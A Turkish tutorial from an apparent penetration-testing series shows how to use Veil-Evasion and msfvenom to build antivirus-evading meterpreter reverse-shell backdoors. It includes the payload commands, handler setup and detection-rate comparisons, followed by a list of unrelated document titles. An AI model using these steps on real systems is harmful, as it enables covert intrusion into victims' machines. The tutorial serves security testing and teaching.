Anti-Virüs Atlatma 2. Kurulum
|
|
- Hazan Açık
- 7 yıl önce
- İzleme sayısı:
Transkript
1 Anti-Virüs Atlatma 2 Merhaba, bu yazımızda işleyeceğimiz araç Veil-evasion dur. Veil, açık kaynak kodlu olarak geliştirilen bir framework tür. Biz Veil framework içerisindeki anti-virüs atlatma aracı olan Veil-evasion u kullanacağız. Kurulum Linux üstüne kurulumu için mevcut kodlarının olduğu Github sayfasından ( indirip setup klasörünün altında bulunan setup.sh scripti ile kurulumu yapabilirsiniz. git clone cd Veil-Evasion/setup bash setup.sh -s
2 Veya depo dan direkt olarak bağımlılıklarıyla beraber kurulumunu yapabilirsiniz. Bunun için; apt-get install veil-evasion Çok sayıda paketi de kendisiyle beraber kuracaktır. İndirme ve kurulum işlemleri bittikten sonra terminal ekranında yapılandırılan konfigürasyonlar ve dosya yolları görünecektir. 32 bit bir işletim sisteminde daha rahat olacaktır kurulum işlemi. 64 bit sistemlerde kurulum yapıldığı zaman, gerekli yan uygulamalar ve wine 32bitlik sistemlere göre kurulacak ve yapılandırılacaktır, çoğu zaman da hata ile
3 karşılaşılabilmektedir. Konfigürasyon dosyası olan /etc/veil/settings.py içerisinde sisteminize uygun değişiklikleri yapabilirsiniz. Konfigürasyon dosyasında boş olarak görünen alan olan MSFVENOM_OPTIONS kısmı payload oluşturma sırasında ham bir payload yerine ek parametrelerle bir payload oluşturma imkanı sağlar. Örnek olarak oluşturma sırasında seçilecek bir encode tekniği kullanılarak birkaç iterasyondan geçirmesi sağlanabilir. Veil-evasion Kaynak koddan kurduysanız Veil-Evasion klasöründeki Veil- Evasion.py dosyasını çalıştırarak, depodan kurduysanız, komut satırından veil-evasion komutunu girerek başlatabilirsiniz. Başlangıç ekranından görüldüğü üzere şu an için kullandığımız versiyon olan için kullanılabilecek 47 payload vardır.
4 Kullanım Kullanımı Metasploit ile benzerdir ve TAB ile tamamlama desteği vardır. Öncelikle list diyerek kullanılabilecek payloadları görelim. Aşağıda verilmiş olan resimden de anlaşılacağı üzere C, C#, GO, Python, Ruby, Powershell gibi dilleri kullanarak oluşturulabilen payloadları vardır. Bir payloadı seçmek için use komutunu kullanmanız gerekmektedir. use [Payload index numarası] veya use [Payload ismi] kullanım şekilleri ile kullanılabilir.
5 Örnek Örnek olarak Python ile yazılmış, meterpreter ile bize reverse_tcp bağlantı verecek olan payloadı kullanalım. Seçtiğimiz payload: python/meterpreter/rev_tcp, index numarası 31.Bu payloadı kullanmak için use 31 veya use python/meterpreter/rev_tcp diyoruz.
6 Gelen ekranda görüldüğü üzere birçok parametre vardır > Bunları teker teker açıklamak gerekise; ARCHITECTURE: Varsayılan olarak 32 bittir. Üretilecek olan zararlı yazılımın işlemci mimarisini belirtir. COMPILE_TO_EXE: Varsayılan olarak Y dir. Üretilecek olan zararlı yazılımın çalıştırılabilir bir dosya tipi olarak EXE ye dönüştürülmesini belirtir. EXPIRE_PAYLOAD: Opsiyonel olarak kullanılabilir bir alandır. Devre dışı bırakılacak özelliği tanımlamamızı sağlar. LHOST: Metasploit te dinlemeyi yapacağımız handler in IP adresi. LPORT: Metasploit te dinlemeyi yapacağımız handler in port adresi. USE_PYHERION: Varsayılan olarak N dir. Üretilecek zararlı yazılımın ek olarak Python un pyherion şifrelemesinden geçirileceğini belirtir. Msfvenom ile Backdoor Veil ile oluşturacağımız zararlı yazılım ile karşılaştırıp farkı görmek açısından önce Metasploit araçlarından olan msfvenom ile basit bir arka kapı oluşturalım. msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=7788 -f exe -o rawbackdoor.exe Oluşturduğumuz zararlı yazılımı online bir anti-virüs tarama sitesi olan üstünde tarayalım ve
7 sonuçları görelim. Not: Bu tarz sistemler çıktılardan gelen sonuçları anti-virüs firmalarıyla paylaştığı ve imza tabanlı çalıştığı için, önceden yapılan taramalardan dolayı oluşturulan payloadları çok sayıda anti-virus yazılımı keşfedebilir düzeye gelmiştir. Bu yüzden anti-virus bypass uygulamalarında bir not olarak, online sistemlerde taratmayın diye not düşebilirler. Veil ile Backdoor Veil üstünde oluşturacağımız zararlı yazılımın, seçtiğimiz modüle göre, gerekli parametrelerini girdikten sonra generate komutu ile oluşturma işlemini başlatabiliriz. Generate dedikten sonra oluşturma işlemine başlamadan önce bize çıktı olarak vereceği dosyanın adını ne koyacağımızı soruyor. Bu değer default olarak payload olarak belirlenmiştir. Seçtiğimiz modülün parametrelerinden olan COMPILE_TO_EXE ye argüman olarak Y değerini verdiğimiz için oluşturalacak olan Python dosyasını exe olarak çalıştırılabilir dosya formatına dönüştürecektir. Burada oluşturulan çıktı dosyasının, çalıştırılabilir dosya formatına
8 dönüştürülmesi işlemi farklı python modülleri gerçekleşebilmektedir. Veil içinde default olarak Pyinstaller kullanılmaktadır. Bizde bu yazı sırasında 1 seçeneğinde bulunan Pyinstaller ı kullanacağız. 1 değerini girdikten sonra arka kapı oluşturma işlemi başlıyor. Zararlı yazılımın oluşturma işlemi tamamlandı. Verilen çıktıda, oluşturulan zararlı yazılım ile ilgili birkaç özellik bulunmaktadır. Bunlar, hangi dilde oluşturulduğu, payload olarak hangi metasploit payload ı kullanıldığı, kullanılan parametreler ve bunlara verilen değerler, payload dosyasının (zararlı yazılımımızın) bulunduğu konum ve handler dosyasının bulunduğu konum.
9 Metasploit Handler Resource Burada oluşturulan handler dosyası (resource), Metasploit tarafında gelen bağlantıları bekleme sırasında oluşturacağımız handler in script versiyonudur. Handler dosyası ile Metasploit tarafında, otomatik olarak komutları oluşturulan, oluşturduğumuz zararlı yazılıma göre parametreleri girip beklemeyi başlatabiliriz. Scripti Metasploit üstünde çalıştırmak için komut satırından msfconsole -r [Resource dosya konumu] veya açık olan Metasploit komut ekranında resource komutuyla şu şekilde yapılabilir resource [Resource dosya konumu]. Örnek bir kullanım aşağıda verilmiştir. Tarama sonucu Oluşturulan zararlı yazılımın, yapmamamız gereken, online tarama sonucu aşağıda ki resimlerde verilmiştir. İlk olarak popüler olan VirusTotal sayfasında yaptığımız taramanın sonucunu paylaşalım. Bir başka online tarama sayfası olan üstündeki taramanın sonucu ise aşağıdaki gibidir.
10 Jotti üzerinde ilk oluşturduğumuz msfvenom ile ham backdoorzararlı yazılımın tarama sonucunu da paylaşırsak aradaki farkı daha net görebilirsiniz. Reverse Bağlantı Oluşturduğumuz zararlı yazılım öncelikle Metasploit tarafında dinlemeye almamız gerekiyor, gelen bağlantıları yakalamak için. Bunu yukarıda belirttiğimiz resource dosyası ile veya kendimiz multi/handler modülünü kullanarak gerekli opsiyonları düzenleyip dinlemeyi başlatmamız gerek. Bunun için oluşturduğumuz payloada göre girilecek komutlar aşağıdaki gibidir. use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost set lport 7788 set exitonsession false exploit -j -z
11 Dinlemeyi başlattığımıza göre şimdi bekleme sırasında, kurbanın bir şekilde bunu açtığını varsayarsak, meterpreter shell için session ımız oluşuyor. Aktif sessionları listeleyip, bir tanesine geçiş yaptıktan sonra sistem hakkında kısa bir bilgi alma komutu çalıştıralım. Başka Bir Örnek Veil-evasion üstünde kullandığımız python/meterpreter/rev_tcp modülünden sonra kısaca başka bir modül için alınan sonuçları görelim. Kullanılan modül yine aynı aileden fakat farklı bir protokol ile çalışan python/meterpreter/rev_https modülü. Gerekli parametreleri düzenledikten sonra generate diyerek oluşturma işlemini başlatıyoruz.
12 Oluşturulan zararlı yazılımın, online tarama sonucu aşağıda ki resimlerde verilmiştir. İlk olarak popüler olan VirusTotal sayfasında yaptığımız taramanın sonucunu görelim. Bir diğer tarama sayfası olan Jotti den gelen sonucunu görelim.
13
Anti-Virus Atlatma Maligno Kullanımı
Anti-Virus Atlatma Maligno Kullanımı Anti-virüs bypass yazı dizisinin başka bir bölümü olan Maligno aracını anlatan yazı ile devam edeceğiz. Maligno, Encripto tarafından, python diliyle yazılmış ve opensource
DetaylıAnti-Virüs Atlatma 3. Kurulum
Anti-Virüs Atlatma 3 Anti-virüs bypass yazı dizisinin başka bir bölümü olan Shellter aracını anlatan yazı ile devam edeceğiz. Shellter, ücretsiz ve multi platform çalışabilen bir anti-virus bypass aracıdır.
DetaylıAnti-Virus Atlatma - Maligno Kullanımı
Anti-Virus Atlatma - Maligno Kullanımı Anti-virüs bypass yazı dizisinin başka bir bölümü olan Maligno aracını anlatan yazı ile devam edeceğiz. Maligno, Encripto tarafından, python diliyle yazılmış ve opensource
DetaylıAnti-Virüs Atlatma 1. Resimden anlaşıldığı üzere 56 anti-virüs yazılımından 36 tanesi zararlı yazılım olduğunu doğrulamıştır.
Anti-Virüs Atlatma 1 Merhaba, Anti-virüs bypass işlemleri sırasında kullanılan araçların anlatılmasını içerecek olan bu makale, yazı dizisi şeklinde olacaktır. Her yazıda farklı bir anti-virüs bypass aracı
DetaylıSonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.
Linux Sunucuya Kurulumu ve İstemciden Bağlanma OpenVPN Windows VPN, engelli sitelere girmek veya görülmesini istemediğiniz trafiğiniz olduğu zaman işe yarar. Etrafta ücretsiz VPN ler çokca olsada bunların
DetaylıDüşünüyorum! Biraz tarihçe.. Maalesef yanılıyorsunuz.
Parolamın Güvenli Düşünüyorum! Olduğunu Maalesef yanılıyorsunuz. 1990 2010 yılları arasında edindiğiniz bilgiler, 8 karakter uzunluğunda ve rastgele büyük harf, küçük harf, rakam ve sembol içeren bir parolanın
DetaylıSonrasında bahsini ettiğimiz scripti çalıştıralım. Github linki burada.
Linux Sunucuya Kurulumu ve İstemciden Bağlanma OpenVPN Windows VPN, engelli sitelere girmek veya görülmesini istemediğiniz trafiğiniz olduğu zaman işe yarar. Etrafta ücretsiz VPN ler çokca olsada bunların
DetaylıAnti-Virus Atlatma - Maligno Kullanımı
Anti-Virus Atlatma - Maligno Kullanımı Anti-virüs bypass yazı dizisinin başka bir bölümü olan Maligno aracını anlatan yazı ile devam edeceğiz. Maligno, Encripto tarafından, python diliyle yazılmış ve opensource
DetaylıArmitage Nedir? Kullanım Öncesi
Armitage Nedir? Armitage, metasploit veritabanını kullanan grafiksel bir test / saldırı araçlarından bir tanesidir. Armitage metasploit veritabanlarını kullanması nedeniyle hedef sistemin bilgilerine göre
Detaylıe-imzatr Kurulum Klavuzu
e-imzatr Kurulum Klavuzu Sürüm 0.0.1 1 İçindekiler İşletim Sistemi Sistem Türü Öğrenme Java yükleme Akis Kurulum Kart Okuyucu Sürücü Kurulum Kullanıcı Doğrulama 2 İşletim Sistemi Sistem Türü Öğrenme Bu
DetaylıADIM ADIM METASPLOIT METERPRETER SHELL DAVRANIŞ ANALİZİ
1. GİRİŞ Bu yazıda, Metasploit exploit frameworkü üzerinde bulunan meterpreter paylodunun kullandığı bazı modüllerin özellikle ağda ve sistem üzerindeki etkileri araştırılmıştır. Bu konuda SANS'ın da yararlı
Detaylıe-imzatr Kurulum Klavuzu
e-imzatr Kurulum Klavuzu Sürüm 0.0.1 İçindekiler İşletim Sistemi Sistem Türü Öğrenme Java yükleme Akis Kurulum Kullanıcı Doğrulama İşletim Sistemi Sistem Türü Öğrenme Bu başlıkta bilgisayarımızın mevcut
DetaylıHAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ
HAZIRLAYAN BEDRİ SERTKAYA bedri@bedrisertkaya.com Sistem Uzmanı CEH EĞİTMENİ SİSTEM HACKİNG: Windows Sistem Güvenlik Denetimi: Security Account Manager:Güvenlik Hesabı Yöneticisi windows'da yer alan sunucularda
Detaylıe-imzatr Kurulum Klavuzu
e-imzatr Kurulum Klavuzu Sürüm 0.0.1 İçindekiler İşletim Sistemi Sistem Türü Öğrenme Java yükleme Akis Kurulum Kullanıcı Doğrulama İşletim Sistemi Sistem Türü Öğrenme Bu başlıkta bilgisayarımızın mevcut
DetaylıCYGWIN KURULUMU ve KULLANIMI
CYGWIN KURULUMU ve KULLANIMI Cygwin, Microsoft Windows işletim sistemi üzerinde çalışan, open source, bir UNIX simülatörüdür. Cygwin`in asıl amacı *nix türevi sistemlerde yer alan yazılımların Windows
DetaylıMetasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net
Metasploit Framework ile Güvenlik Denetimi Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci at gamasec.net Sunum İçeriği Exploit Kavramı Exploit Geliştirme Süreci Bütünleşik Geliştirme Ortamları Metasploit
Detaylı1 OTOMASYON DÖNÜŞÜM İŞLEMLERİ
1 www.mepsan.com.tr OTOMASYON DÖNÜŞÜM İŞLEMLERİ 2 www.mepsan.com.tr İÇİNDEKİLER 1. Sistem Gereksinimleri 2. Flash Bellek Sıfırlama 3. Flash Belleğe Sistem Yükleme 4. Sistemi Yükleme İşlemi 3 www.mepsan.com.tr
DetaylıDESTEK DOKÜMANI. Ürün : Tiger Enterprise/ Tiger Plus/ Go Plus/Go Bölüm : Kurulum İşlemleri
LOGO PROGRAM KURULUMU VE AYARLARI Logo programlarının yüklemesi için kullanılacak,setup dosyaları ftp://download.logo.com.tr/ adresinden indirilerek yapılır. Örneğin Kobi ürünleri için; ftp://download.logo.com.tr/windows/kobi/guncel/go_plus/klasöründen
DetaylıTarih: 2 Ağustos 2018 Son versiyon: 1.8. EndNote X9 Windows Multi/Site kurulum talimatları
Tarih: 2 Ağustos 2018 Son versiyon: 1.8 EndNote X9 Windows Multi/Site kurulum talimatları İçerik 1 Giriş... 3 2 Oturum aç... 3 3 Download... 4 4 Son kullanıcı dosyası oluşturma... 4 2 1 Giriş ÖNEMLİ: EndNote
DetaylıCLIENT MAKİNELERE IBM SPSS Statistics 21 nin KURULMASI
CLIENT MAKİNELERE IBM SPSS Statistics 21 nin KURULMASI License manager ile lisanslamanın tamamlandığına emin olunduktan sonra son kullanıcıların makinalarına IBM SPSS Statistics 21 client kurulumu yapılabilir.
DetaylıLOGO SMART NAVIGATOR
LOGO SMART NAVIGATOR LOGO Smart Navigator, yönetim karar destek sisteminin bel kemiğini oluşturan Navigator ürünüyle birlikte çalışmaktadır. Adından da anlaşılacağı üzere navigator kullanımını daha kolaylaştırmakta,
DetaylıNagios Network Monitör Uygulaması -2
Nagios Network Monitör Uygulaması -2 Erkan Esmer Temmuz, 2013 İçindekiler 1 Monitoring Sistemleri.......................................... 2 2 Nagios a Windows Sunucu Ekleme....................................
DetaylıTrickbot Zararlı Yazılımı İnceleme Raporu
Trickbot ı İnceleme Raporu trickbot.exe isimli Trojan yazılımı son yıllarda sürekli geliştirilen ve yeni yetenekleri ile karşımıza çıkan bir zararlı yazılımdır. Zararlı olarak çalışma yöntemi Trojan olması
DetaylıGĐRĐŞ. 1 Nisan 2009 tarihinde BDP programının yeni bir sürümü yayınlanmış ve bu sürümde yapılan değişikliklere
e-bildirge Versiyon : Yakamoz 3.6.7.7 ve Genel Muhasebe 3.6.7.8 İlgili Programlar : Yakamoz ve üstü ticari paketler & Genel Muhasebe Tarih : 02.04.2009 Doküman Seviyesi (1 5) : 3 (Tecrübeli Kullanıcı)
DetaylıJasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 2. Bölüm 1- JasperReports Server ve Ireport Nedir?
JasperReports Server ve Ireport raporlama Sistemi Kurulumu / Kullanımı 1. Bölüm 1.1- JasperReports Server ve Ireport Nedir? 1.2- JasperReports Server ve Ireport Kurulumu 1.3- JasperReports Server Genel
DetaylıMICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI
MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI HALİL DALABASMAZ PENETRATION TESTING SPECIALIST ŞUBAT 2015 BGA BİLGİ GÜVENLİĞİ LİMİTED ŞİRKETİ WWW.BGA.COM.TR İÇİNDEKİLER 1. GİRİŞ... 1 2. MICROSOFT
DetaylıSHOP INGENICO DOKUMANI
SHOP INGENICO DOKUMANI Kurulum işlemimizin ilk sırası _POS_Setup kurulumu ile başlıyoruz. Unutmayınız ki pos setup ve kurmuş olduğunuz shop un versiyonlarının güncel olması gerekmektedir. Pos setup ın
DetaylıBu makalede 2003 sunucu, Windows 2003 Server anlamına gelmektedir. Aşağıda yapılan işlemler 2003 R2 sunucu üzerinde denenmiş ve çalıştırılmıştır.
WINDOWS 2003 SUNUCULARI ÜZERĐNE PHP YÜKLENMESĐ ERDAL YAZICIOĞLU erdal(at)gmail.com http://barbarossa41.wordpress.com Merhabalar, Çözümpark.com adresinde bir kullanıcı ASP ve PHP yi aynı sunucu üzerinde
DetaylıAKINSOFT. Eofis NetworkAdmin. AKINSOFT EOfis NetworkAdmin Kurulumu Bilgi Notu. Doküman Versiyon : 1.01.01 Tarih : 10.01.2008. Copyright 2008 AKINSOFT
AKINSOFT EOfis NetworkAdmin Kurulumu Bilgi Notu Doküman Versiyon : 1.01.01 Tarih : 10.01.2008 1 - Çalışma Şekli Hakkında Kısa Bilgi modülü kısaca aşağıdaki işlemleri yapar. Bu özelliklerin çalışabilmesi
Detaylı06 - Bilgi Toplama ve Sosyal Mühendislik
BGM 553 - Sızma Testleri ve Güvenlik Denetlemeleri-I Bilgi Güvenliği Mühendisliği Yüksek Lisans Programı Dr. Ferhat Özgür Çatak ozgur.catak@tubitak.gov.tr İstanbul Şehir Üniversitesi 2016 - Güz İçindekiler
Detaylı10.2 VERİYONUNUN KURULABİLMESİ İÇİN EĞER VARSA ÖNCEKİ. ArcGIS SÜRÜMLERİNİN PROGRAM EKLE-KALDIR SEÇENEĞİYLE
10.2 VERİYONUNUN KURULABİLMESİ İÇİN EĞER VARSA ÖNCEKİ ArcGIS SÜRÜMLERİNİN PROGRAM EKLE-KALDIR SEÇENEĞİYLE YADA BİR PROGRAM SİLME ARACIYLA SİLİNMESİ GEREKMEKTEDİR. PROGRAMIN İNDİRİLMESİ İki aylık deneme
DetaylıRPMNET WOLVOX REPORTER
RPMNET WOLVOX REPORTER TANITIM : EFAR YAZILIM LTD.STI Tarafından Geliştirilen EFAR Wolvox Reporter AKINSOFT Wolvox Kullanıcılarının Android İşletim Sistemi Yüklü Cep Telefonlarından Online Olarak Kullandıkları
DetaylıMaestroPanel Kurulum
MaestroPanel Kurulum 28.09.2011 Oğuzhan YILMAZ oguzhan@maestropanel.com Gereksinimler Windows Server 2008 R2 x64 Any Edition Web Platform Installer 3.0+ Desteklenen Yazılımlar MailEnable 5.x SQL Server
DetaylıTurquaz Windows kurulum dökümanı. ftp://ftp.mirror.ac.uk/sites/ftp.postgresql.org/binary/v7.3.1/windows/pgsql731wina1.exe
1. Giriş Turquaz programını windows üzerinde çalıştırmak için öncelikle bilgisayarınızda postgresql ve Java nın kurulu olması gerekli. Aşağıdaki bilgi ve dökümanlar windows 2000 işletim sistemi üzerinde
DetaylıMetasploit Framework ile Güvenlik Denetimi. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net
Metasploit Framework ile Güvenlik Denetimi Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Sunum İçeriği Exploit Kavramı Exploit Geliştirme Süreci Bütünleşik Geliştirme Ortamları Metasploit
DetaylıProject Vesta Documentation
Project Vesta Documentation Sürüm 1.0.4 Ege Emir Ozkan Haz 23, 2017 İçindekiler 1 Giriş 3 2 Kurulum 5 2.1 Python, Pip ve Modüller......................................... 5 2.2 MySQL..................................................
DetaylıZTerminal KULLANMA KILAVUZU. yazılımı. USB Terminal
ZTerminal USB Terminal yazılımı KULLANMA KILAVUZU Z Telemetri Telekomünikasyon Yazılım San. Tic. LTD. Şti. info@ztelemetry.com Tel: +90 312 417 1243 www.ztelemetry.com 01 AÇIKLAMA ZTerminal Yazılımı ile
DetaylıSqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır.
SqlMap Kullanımı Sqlmap pyhton dili yazılarak geliştirilmiş Sql injection için testerlara son derece yardımcı olan bir araçtır. Temel olarak yaptığı işlem sizin belirtmiş olduğunuz parametrelere göre hedef
Detaylıhttp://www.microsoft.com/visualstudio/eng/downloads
Visual Studio 2012'nin kurulumunu, Visual Studio'nun kullanımını ve Windows Store'da basit bir proje hazırlanmasını anlatacağım. Hepsinden önce Visual Studio ortamından biraz bahsedelim. Visual Studio
DetaylıETKİLEŞİMLİ TAHTA KORUMA SİSTEMİ KURULUM
1. Sistem 3 bileşenden oluşur a. Sunucu b. Koruma yazılımı c. Mobil anahtar ETKİLEŞİMLİ TAHTA KORUMA SİSTEMİ KURULUM Sunucu yazılımı: sunucu yazılımı öncelikle yerel ağda et (etkileşimli tahtaların) bağlı
DetaylıELEKTRONİK BELGE YÖNETİM SİSTEMİ KOORDİNATÖRLÜĞÜ (EBYS KOORDİNATÖRLÜĞÜ) ELEKTRONİK İMZA KURULUM AŞAMALARI VE EBYS PROGRAMI SİSTEM GEREKSİNİMLERİ
ELEKTRONİK BELGE YÖNETİM SİSTEMİ KOORDİNATÖRLÜĞÜ (EBYS KOORDİNATÖRLÜĞÜ) ELEKTRONİK İMZA KURULUM AŞAMALARI VE EBYS PROGRAMI SİSTEM GEREKSİNİMLERİ E-İMZA KURULUM AŞAMALARI Birimimizden almış olduğunuz e-imzanızı
DetaylıWindows XP Professional Kurulumu
Windows XP Professional Kurulumu ve YönetimiY Kuruluma Geçmeden Önce XP HOME EDİTİON / XP PROFESSİONAL ONAL ARASINDAKİ FARK Şimdi Kuruluma Geçelim elim XP Cd mizi takıyoruz ve bilgisayarımızı yeniden başlatıyoruz
DetaylıETA:SQL VE ETA:V.8-SQL PROGRAMLARINDA INSTALL ĐŞLEMĐNDE ANA BĐLGĐSAYAR KAVRAMI
17 Mart 2010 Đlgili Versiyon/lar : ETA:SQL, ETA:V.8-SQL Đlgili Modül/ler : Genel BĐLGĐSAYAR DEĞĐŞĐKLĐĞĐ ve INSTALL ĐŞLEMĐ ETA:SQL VE ETA:V.8-SQL PROGRAMLARINDA INSTALL ĐŞLEMĐNDE ANA BĐLGĐSAYAR KAVRAMI
DetaylıWAMP SERVER KURULUMU
WAMP SERVER KURULUMU Bilgisayarınızda; PHP web programlama dilini kullanarak web sayfası hazırlayacaksanız ya da PHP web programlama dili kullanılarak hazırlanmış Joomla, Wordpress, Drupal vb.. içerik
Detaylı1- Mikro Yazılım e-defter Kullanıcılarımızın Dikkatine.
15xx versiyonu 24/03/2017 Tarihli Arşivin İçeriği 1- Mikro Yazılım e-defter Kullanıcılarımızın Dikkatine. Kuruluş Programında yer alan Firma Tanıtım kartı /e-defter-e-fatura parametreleri sekmesindeki
DetaylıT. C. İSTANBUL TEKNİK ÜNİVERSİTESİ Bilişim Enstitüsü ENFORMASYON SİSTEMLERİNİN TASARIMI VE YÖNETİMİ
T. C. İSTANBUL TEKNİK ÜNİVERSİTESİ Bilişim Enstitüsü ENFORMASYON SİSTEMLERİNİN TASARIMI VE YÖNETİMİ SHOREWALL, FIRESTARTER, DEVIL-LINUX SİSTEMLERİNİN KURULUMU VE KARŞILAŞTIRILMASI Can Mustafa Köne SHOREWALL
Detaylı[ Web Uygulamalarında Kayank Kod Analizi II ] [ Mehmet Dursun INCE < mehmet.ince@intelrad.com > ] [ 10 Haziran 2013 ]
[ Web Uygulamalarında Kayank Kod Analizi II ] [ Mehmet Dursun INCE < mehmet.ince@intelrad.com > ] [ 10 Haziran 2013 ] 1 GİRİŞ Bu döküman Web Uygulamalarında Kaynak Kod Analizi isimli yazı serisinin 2.
DetaylıSistem ve Ağ İzleme, Test Etme Araçları
Sistem ve Ağ İzleme, Test Etme Araçları Erkan Esmer Kasım, 2012 İçindekiler 1 Giriş.................................................... 2 2 Nessus.................................................. 3 3
DetaylıDeğerli Datasoft Kullanıcısı;
Değerli Datasoft Kullanıcısı; Datasoft Yazılım, Genel Muhasebe, İşletme Defteri ve BBS (Bürü Bilgi Sistemi) Serbest Meslek Defteri Programları Beyannameler bölümümden çalışan; beyanname paketlerini gönderme,
DetaylıASİSTAN v2 KULLANIM KILAVUZU
ASİSTAN v2 KULLANIM KILAVUZU AÇILIŞ Programa giriş yaptığınızda karşınıza destek sayfamız gelecektir. Buradan program kullanımı ve olası hatalar hakkında bilgiler alabilir, güncellemeler ve gerekli programların
DetaylıKabuk Programlama (Bash)
Kabuk Programlama (Bash) Erkan Esmer Ocak, 2013 İçindekiler 1 Giriş.................................................... 2 2 Kabuk(Shell)............................................... 3 3 Çekirdek(Kernel).............................................
DetaylıEFe Event Management System
EFe Event Management System Kurulum Dökümanı Efe Event Management System V.0.5 Yazan Açıklama Tarih Aykut Güven EFEM İlk Versiyon 24.01.2018 İÇİNDEKİLER Ön Gereksinimler... 3 Tavsiye edilen konfigürasyon...
DetaylıNova Dental 2008-3D Ana Makine Kurulum (Windows Server 2003- XP Home/Pro)
Nova Dental 2008-3D Ana Makine Kurulum (Windows Server 2003- XP Home/Pro) Bu yazıda bir NovaSoft Dental yazılımının ana makinaya kurulumunu göreceğiz. Index 1.Adım : NovaSoft Dental Kurulum CD/DVD'sinin
DetaylıMeMu LABORATUVAR KONTROL SISTEMI BETA(Sürüm 0.2) YAZILIM TASARIM Mesut ERDEMİR Mustafa KARAS (www.mesuterdemir.com) (www.mustafakaras.
MeMu LABORATUVAR KONTROL SISTEMI BETA(Sürüm 0.2) YAZILIM TASARIM Mesut ERDEMİR Mustafa KARAS (www.mesuterdemir.com) (www.mustafakaras.com) MeMu Laboratuvar Yazılımı, laboratuvarların kontrol edilebilmesi
DetaylıDenetim Masası/Programlar/Windows özelliklerini Aç/Kapat
Merhaba arkadaşlar, Bu yazımızda yerel ağda veya Ip adresimizle bir web sitesinin paylaşıma açılması, aynı ağdan veya uzaktan bir bilgisayarın web sitemize nasıl erişebileceği konuları üzerinde duracağız.
DetaylıSQL SERVER 2005 ENTEGRE SQL (VTY) VERİ TABANI YÖNETİM KURULUMU RESİMLİ ANLATIMI. Entegre SQL kurmadan önce SQLSERVER 2005,i kuralım öncelikle.
SQL SERVER 2005 ENTEGRE SQL (VTY) VERİ TABANI YÖNETİM KURULUMU RESİMLİ ANLATIMI Entegre SQL kurmadan önce SQLSERVER 2005,i kuralım öncelikle. Kurulumu başlattık.kutucuğu işaretledik resimdeki gibi. Ve
DetaylıBITSTRIPS. Bitstrips nedir?
BITSTRIPS Bitstrips nedir? Bitstrips, kendinizi ve arkadaşlarınızı karikatürize ederek, düz ve sade bir yolla mesajlaşmak yerine karikatürlerin üzerine ekleyeceğiniz mesajlar sayesinde çok daha eğlenceli
DetaylıUBNT. UniFi mfi Ububntu. Ubuntu İşletim Sistemi ve UniFi/mFi Yazılımlarının Kurulumu
UBNT UniFi mfi Ububntu Ubuntu İşletim Sistemi ve UniFi/mFi Yazılımlarının Kurulumu İlknur Duran - Net Vizyon Bilgi İşlem A.Ş. Ubiquiti Networks (UBNT) UniFi ve mfi ürün ailesinin kurulumu, konfigurasyonu
DetaylıWolvox Kapı Ekranı. AKINSOFT Wolvox Kapı Ekranı Yardım Dosyası. Doküman Versiyon : 1.02.01
AKINSOFT Yardım Dosyası Doküman Versiyon : 1.02.01 Tarih : 15.11.2014 1 1. KULLANIM AMACI Personel takip sistemi kullanmak isteyen tüm işletmeler için geliştirilmiştir. WOLVOX İnsan Kaynakları programı
Detaylı27 Kasım Ekran 1: ETA:SQL Yazılım Güncelleme Uygulaması
27 Kasım 2017 İlgili Versiyon/lar : ETA:SQL, ETA:V.8-SQL, ETA:SB İlgili Modül/ler : Genel ETA:SQL YAZILIM GÜNCELLEME UYGULAMASI Programlarımız teknolojik gelişmeler, mevzuat değişiklikleri, kullanıcı talepleri
DetaylıBIND ile DNS Sunucu Kurulumu
BIND ile DNS Sunucu Kurulumu BIND Nedir? BIND bir dns sunucusu yani unix ve linux sistemler üzerinde dns servis hizmetini veren başarılı bir daemondur. Kısacası en popüler DNS sunucu yazılımı BIND dir.
DetaylıLinux Ubuntu Kurulumu
Linux Ubuntu Kurulumu Elbistan Meslek Yüksek Okulu 2016 2017 Bahar Yarıyılı https://wiki.ubuntu-tr.net/index.php?title=kurulum https://wiki.ubuntu-tr.net/index.php?title=ubuntu_linux_kurulum_rehberi Öğr.Gör.Murat
DetaylıSiteye girişte kullanıcı adı ve parola soran bir ekran karşına gelecektir.
Versiyon Güncelleme Nasıl Yapılır? Versiyon güncelleme için öncelikle Bilnex programının güncel setup dosyasını bilgisayarınıza indirmeniz gerekir. Güncel setup dosyasını ftp.bilnexdestek.com adresinden
DetaylıBilgi Güvenliği Denetim Sürecinde Özgür Yazılımlar. Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net
Bilgi Güvenliği Denetim Sürecinde Özgür Yazılımlar Fatih Özavcı Bilgi Güvenliği Danışmanı fatih.ozavci@gamasec.net Bilgi Güvenliği Denetimi Kurumların sahip olduğu politikaların ve uygulamalarının, güvenlik
DetaylıRezistivite Cihazı Kullanım Klavuzu
Rezistivite Cihazı Kullanım Klavuzu Açılış ekranı açıklamaları: 1 - Son çalışma aç : Cizhazda en son çalışma yaptığınız dosyayı açar. 2 - Dosya aç : İstediğiniz dosyayı açmanızı sağlar. 3 Yeni çalışma
DetaylıİSTANBUL ÜNİVERSİTESİ MÜHENDİSLİK FAKÜLTESİ BİLGİSAYAR MÜHENDİSLİĞİ BÖLÜMÜ SİSTEM PROGRAMLAMA DERSİ. Öğr.Gör. Mehmet DEMİR
